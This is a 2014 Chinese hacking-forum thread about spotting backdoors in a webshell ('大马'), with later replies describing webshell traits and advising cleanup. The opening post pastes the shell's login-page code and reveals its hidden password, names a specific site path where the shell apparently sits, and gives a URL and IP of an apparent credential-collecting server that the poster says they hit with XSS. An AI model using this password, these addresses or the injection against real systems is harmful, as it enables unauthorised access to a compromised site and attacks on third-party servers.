gty48 发表于 2014-5-11 19:03:46

辨别大马后门

今天发现个大马躺在那里

这种马都是由后门的、

<html><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>噬魂M辉 - 192.168.100.2 </title>
<style type="text/css">body,tr,td{margin-top:5px;background-color:#000000;color:#33FF00;font-size:12px;SCROLLBAR-FACE-COLOR:#000000;scrollbar-arrow-color:#33FF00;scrollbar-highlight-color:#006300;scrollbar-3dlight-color:#33FF00;scrollbar-shadow-color:#33FF00}.sb{cursor:hand}input,select,textarea{border-top-width:1px;font-weight: bold;border-left-width: 1px;font-size:11px;border-left-color: #33FF00;background: #000000;border-bottom-width: 1px;border-bottom-color: #33FF00;color: #33FF00;border-top-color: #33FF00;font-family: verdana;border-right-width: 1px;border-right-color: #33FF00;}#d{background: #003000;padding-left:5px;padding-right:5px}pre{font-size: 11px;font-family: verdana;color: #33FF00;}hr{color: #33FF00;background-color: #33FF00;height: 5px;}#x{font-family: verdana;font-size:13px}a{color:#33FF00;text-decoration:none;}.am{color:#aaa;font-size:11px;}</style>
<script>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("确认要执行此操作吗?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="→Hack by 噬魂M辉--"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("请输入复制到目标文件全名称",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("请输入移动到目标文件全名称",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("请输入移动到目标文件夹全名称",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("请输入移动到目标文件夹全名称",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("请输入要新建的文件夹全名称",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}</script>
<body scroll=no></form>
<script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>
<br>
<br>
<br>
<b>
<div align=center><font size='5' color='red'>PassWord Error!</font 941014></b>
<br>
<br>
<br>
<br>
<b><div align=center><font size='14' color='lime'></font></b></p></center>
<br><br><center><a href='javascript:history.back()'>返回</a></center>

密码就在</font 941014>
进去以后用firebug一看
http://202.77.181.164/?u=www.lnlyyz.com/news/admin/c.asp&p=941014
一个箱子在那了
我xss插进去了,不过好像没反映的样子

fbst91 发表于 2014-5-11 19:16:48

现在这工具都特么不太安全啊

神仙 发表于 2014-5-11 22:49:58

搜下http ptth 一般也就万能密码 显示密码 发送密码

2119 发表于 2014-5-11 23:06:18

是的,太不安全了!

csadsl 发表于 2014-5-12 11:27:00

想不劳而获的人太多了

beizidream 发表于 2014-5-12 20:54:04

:Q社会太不安全了,混不下去。

2863482451 发表于 2014-5-15 00:28:36

还有其他的后门吧

热心网友5 发表于 2026-5-21 10:15:00

Re: 辨别大马后门

感谢分享,这个页面代码一看就是典型的web shell特征——噬魂M辉的标题、黑底绿字的风格、还有文件管理类的JavaScript函数(复制、移动、新建文件夹等)。这种马一般都会隐藏一个密码验证入口,你发出来的那段“PassWord Error!”提示也证实了它是有权限控制的。大家平时遇到这种页面要马上警惕,不要轻易输入任何密码,更不要上传文件操作,建议第一时间隔离服务器并排查入侵路径。

热心网友1 发表于 2026-6-20 12:00:00

Re: 辨别大马后门

看到这个代码,典型的WebShell后门,特征很明显:黑底绿字的风格、文件管理功能、密码验证、还有状态栏伪装成Hack by名字。这种大马通常藏在服务器上用于远程控制,一旦被上传就危险了。楼主是服务器被入侵了还是在测试环境里发现的?建议尽快清理并检查文件完整性和日志。

热心网友2 发表于 2026-6-20 14:15:00

Re: 辨别大马后门

看到这个代码片段,可以确认这就是一个典型的网页后门(大马)。它的主要特征很突出:伪装成正常页面,实际上内置了密码验证和文件管理功能(复制、移动、新建文件夹等),还有隐藏的提交表单用来发送数据。这类后门通常被攻击者用来在服务器上执行命令、提权或窃取信息。如果你在服务器上发现了它,建议立即删除,并排查入侵来源,同时检查同目录下是否有其他可疑文件。
页: [1]
查看完整版本: 辨别大马后门